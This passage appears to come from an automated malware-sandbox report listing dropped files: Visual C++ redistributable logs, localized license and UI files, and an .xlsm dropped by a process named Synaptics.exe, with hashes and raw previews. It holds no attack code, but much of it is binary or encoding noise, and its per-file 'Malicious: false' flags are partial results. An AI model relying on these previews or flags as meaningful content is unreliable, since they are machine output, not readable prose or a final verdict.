Preview:	..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.0.1./.2.0.2.5. . .1.4.:.4.2.:.0.1. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.4.5.D.7.D.3.A.0.-.7.4.5.0.-.4.B.4.0.-.B.3.6.3.-.2.D.6.0.A.B.F.F.4.7.6.B.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.8.6...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.1.0.:.A.0.). .[.1.4.:.4.2.:.0.1.:.4.2.4.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.1.0.:.A.0.). .[.1.4.:.4.2.:.0.1.:.4.2.4.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.1.0.:.A.0.). .[.1.4.:.4.2.:.0.1.:.4.2.4.].:. ........ .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . ........ .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.2.B.C.3.B.D.4.D.-.F.A.B.A.-.4.3.9.4.-.9.3.C.7.-.9.A.C.8.2.A.2.6.3.F.E.2.}.v.1.4...2.5...2.8.5.0.8.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.

C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144137_001_vcRuntimeAdditional_x86.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (411), with CRLF line terminators
Category:	dropped
Size (bytes):	146580
Entropy (8bit):	3.8240085974215376
Encrypted:	false
SSDEEP:	3072:sY8jh0pppppppppppTTGg18ZYcFDafRbosu7Ee:ojP
MD5:	41A6146002D8DF45566AD9B8B707A033
SHA1:	EFA77EB745C19CA75ED9D3BB64C4E21A5C7BD3EB
SHA-256:	566930DCDE97B5658129FDD5B3D8B3E30A082B45E784A4441919618B3346664E
SHA-512:	384C35EEBAFD882DF67276B163EF310D1EFE6C92A902C5121975E8715344A686C0939B372C832F8E47BC1B08A769C5A0FA9F133A13B1B7F30C6B8F30C8B53BA2
Malicious:	false
Preview:	..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.0.1./.2.0.2.5. . .1.4.:.4.2.:.0.3. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.4.5.D.7.D.3.A.0.-.7.4.5.0.-.4.B.4.0.-.B.3.6.3.-.2.D.6.0.A.B.F.F.4.7.6.B.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.8.6...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.1.0.:.F.4.). .[.1.4.:.4.2.:.0.3.:.2.5.2.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.1.0.:.F.4.). .[.1.4.:.4.2.:.0.3.:.2.5.2.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.1.0.:.F.4.). .[.1.4.:.4.2.:.0.3.:.2.5.2.].:. ........ .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . ........ .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.0.F.A.6.8.5.7.4.-.6.9.0.B.-.4.B.0.0.-.8.9.A.A.-.B.2.8.9.4.6.2.3.1.4.4.9.}.v.1.4...2.5...2.8.5.0.8.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.

C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144211.log

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3883
Entropy (8bit):	5.391109120317181
Encrypted:	false
SSDEEP:	96:8Z/24IlvTD2i3ZTAnUf1BE1Bq1Bx1BF1BC1B41Bn1Bwmwqpw/wZpwYw0pwUwYpVj:nPUnm1a1w1f1X181C1p1V
MD5:	841869088E65A9F22F421F7851FD55C6
SHA1:	58D34EEC2117C3521520A0B1182B41B2EF4BEEA9
SHA-256:	338AFDA9C76EE96FBF820E68B65CECB4646E6C361BD656E89F01EDE9600B82C7
SHA-512:	3AA025AD491289AD492F8DF34127E05D540FDEDE6B86ABE8AB68F01B67EF44A868B851A7D7A5B82463757217126DDC0506B72E3A6A5D637C02D8C192B1A2C5F0
Malicious:	false
Preview:	[1D80:1D84][2025-01-02T14:42:10]i001: Burn v3.10.4.4718, Windows v10.0 (Build 19045: Service Pack 0), path: C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe..[1D80:1D84][2025-01-02T14:42:10]i009: Command Line: '"-burn.clean.room=C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe" -burn.filehandle.attached=532 -burn.filehandle.self=540'..[1D80:1D84][2025-01-02T14:42:11]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_x86_20250102144211.log'..[1D80:1D84][2025-01-02T14:42:11]i000: Setting string variable 'WixBundleManufacturer' to value 'Microsoft Corporation'..[1D80:1D9C][2025-01-02T14:42:11]i000: Setting version variable 'WixBundleFileVersion' to value '14.25.28508.3'..[1D80:1D84][2025-01-02T14:42:11]i100: Detect begin, 10 packages..[1D80:1D84][2025-01-02T14:42:11]i000: Setting version variable 'windows_uCRT_DetectKey' to value '10.0.19041.789'..[1D80:1D84][2025

C:\Users\user\AppData\Local\Temp\s7GdySVm.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1028\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	18127
Entropy (8bit):	4.036737741619669
Encrypted:	false
SSDEEP:	192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
MD5:	B7F65A3A169484D21FA075CCA79083ED
SHA1:	5DBFA18928529A798FF84C14FD333CB08B3377C0
SHA-256:	32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
SHA-512:	EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1028\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2980
Entropy (8bit):	6.163758160900388
Encrypted:	false
SSDEEP:	48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
MD5:	472ABBEDCBAD24DBA5B5F5E8D02C340F
SHA1:	974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
SHA-256:	8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
SHA-512:	676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ................. ......................../passive \| /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1029\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13053
Entropy (8bit):	5.125552901367032
Encrypted:	false
SSDEEP:	192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
MD5:	B408556A89FCE3B47CD61302ECA64AC9
SHA1:	AAC1CDAF085162EFF5EAABF562452C93B73370CB
SHA-256:	21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
SHA-512:	BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1029\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3333
Entropy (8bit):	5.370651462060085
Encrypted:	false
SSDEEP:	48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
MD5:	16343005D29EC431891B02F048C7F581
SHA1:	85A14C40C482D9351271F6119D272D19407C3CE9
SHA-256:	07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
SHA-512:	FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive \| /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1031\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11936
Entropy (8bit):	5.194264396634094
Encrypted:	false
SSDEEP:	192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
MD5:	C2CFA4CE43DFF1FCD200EDD2B1212F0A
SHA1:	E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
SHA-256:	F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
SHA-512:	6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1031\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3379
Entropy (8bit):	5.094097800535488
Encrypted:	false
SSDEEP:	48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
MD5:	561F3F32DB2453647D1992D4D932E872
SHA1:	109548642FB7C5CC0159BEDDBCF7752B12B264C0
SHA-256:	8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
SHA-512:	CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive \| /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1036\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11593
Entropy (8bit):	5.106817099949188
Encrypted:	false
SSDEEP:	192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
MD5:	F0FF747B85B1088A317399B0E11D2101
SHA1:	F13902A39CEAE703A4713AC883D55CFEE5F1876C
SHA-256:	4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
SHA-512:	AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1036\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3366
Entropy (8bit):	5.0912204406356905
Encrypted:	false
SSDEEP:	48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
MD5:	7B46AE8698459830A0F9116BC27DE7DF
SHA1:	D9BB14D483B88996A591392AE03E245CAE19C6C3
SHA-256:	704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
SHA-512:	FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive \| /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1040\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11281
Entropy (8bit):	5.046489958240229
Encrypted:	false
SSDEEP:	192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
MD5:	9D98044BAC59684489C4CF66C3B34C85
SHA1:	36AAE7F10A19D336C725CAFC8583B26D1F5E2325
SHA-256:	A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
SHA-512:	D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\p

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1040\thm.wxl

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3319
Entropy (8bit):	5.019774955491369
Encrypted:	false
SSDEEP:	48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
MD5:	D90BC60FA15299925986A52861B8E5D5
SHA1:	FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
SHA-256:	0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
SHA-512:	11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive \| /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

C:\Users\user\AppData\Local\Temp\{7EBD11E1-0ED8-4E4E-9B45-8AC1C6528522}\.ba\1041\license.rtf

Download File

Process:	C:\ProgramData\Package Cache\{65e650ff-30be-469d-b63a-418d71ea1765}\VC_redist.x86.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	28232
Entropy (8bit):	3.7669201853275722
Encrypted:	false
